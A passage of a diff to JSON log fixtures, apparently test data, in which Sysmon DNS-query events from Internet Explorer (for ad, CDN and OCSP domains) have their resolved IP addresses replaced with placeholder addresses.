UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -7319,7 +7319,7 @@ "event_data": { "QueryName": "ul1.dvtps.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.811", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7380,7 +7380,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7397,7 +7397,7 @@ "ProcessId": "2736", "QueryName": "tags.bluekai.com", "QueryStatus": "0", - "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;", + "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -7425,7 +7425,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -7437,7 +7437,7 @@ "ProcessId": "2736", "QueryName": "cdnjs.cloudflare.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, 
@@ -7464,7 +7464,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7479,7 +7479,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.051", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7520,7 +7520,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.054", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7536,7 +7536,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7570,7 +7570,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.trust-provider.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 }
 },
@@ -7578,7 +7578,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7593,7 +7593,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 